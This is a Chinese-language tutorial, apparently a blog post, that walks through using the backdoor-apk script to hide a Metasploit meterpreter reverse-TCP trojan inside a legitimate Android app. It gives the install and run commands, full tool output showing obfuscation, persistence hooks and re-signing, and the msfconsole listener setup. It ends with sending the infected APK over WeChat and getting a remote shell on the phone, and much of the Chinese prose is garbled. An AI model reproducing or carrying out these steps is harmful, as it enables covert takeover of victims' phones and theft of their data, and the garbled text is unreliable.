backdoor-apk是一个shell脚本 *** ，它简单化了向一切Android APK文档加上木马程序的全过程。此shell脚本 *** 的客户应具备Linux，Bash，Metasploit，Apktool，Android SDK， *** ali等的工作中专业知识。此shell脚本 *** 按原状出示，不出示一切方式的贷款担保，仅用以文化教育目地。

通俗化的讲：backdoor-apk 从姓名上大家就能了解它的主要用途了，没有错便是用于制做 APK 侧门的。这款专用工具应用起來十分便捷，并且作用也很强劲！话不多说，下边大家直接进入主题。

特别提示：原文中谈及的一部分技术性仅作安全学习和课堂教学主要用途，严禁不法应用！

1、更先，使我们对它开展安裝，在安裝前大家必须先安裝它的一些依靠 lib 库文件：

apt-get install lib32stdc  6 lib32ncurses5 lib32z1

2、这儿了解大家，对这种安裝的服务项目，当她们升级时已不开展了解。大家挑选 Yes 就可以！

在进行之上依靠库的安裝后然后大家就可以安裝 backdoor-apk 啦!

backdoor-apk 免费下载、安裝、使用 ***

1、免费下载backdoor-apk

我是立即用的git下载backdoor-apk，其他 *** 还可以，比如：wget；

git clone https://github.com/dana-at-cp/backdoor-apk.git

2、免费下载进行后大家进到到其文件名称下：

cd backdoor-apk/

3、在当前目录下，我们可以见到一个脚本文件。

需注意：大家必须准备充分一个用于关联侧门的apk文件。

./backdoor-apk.sh /root/secist.apk
挑选 3 payload
LHOST：192.168.15.131
LPORT：4444

4、Android明细管理权限选择项：

[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1

怎么知道侧门APK是不是转化成 取得成功？

下列操作流程就算是取得成功！

[email protected]:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.3 on Mon Oct  9 16:50:06 EDT 2017
[ ] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[ ] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[ ] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT  *** ali files...done.
[*] Copying RAT  *** ali files to new directories in original project...done.
[*] Fixing RAT  *** ali files...done.
[*] Obfuscating const-string values in RAT  *** ali files...done.
[*] Locating  *** ali file to hook in original project...done.
[*] Adding hook in original  *** ali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[email protected]:~/Code/github/backdoor-apk/backdoor-apk#

5、取得成功实行之上实际操作后，会转化成一个关联侧门的 secist.apk 文档，默认设置被储存在 backdoor-apk>>original>>dist 文件目录下！下边大家来起动监听：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit

6、另外，我将转化成的含有侧门的 APK 发送到我的微信，并开展安裝开启！

7、迅速我们可以见到，我已经获得了手机上的 meterpreter shell ！

简易键入一个,查询系统信息的指令：

sysinfo

能够见到总体目标系统软件为 安卓6 版本号，核心为 linux 3.10.49 构架为 armv7l 。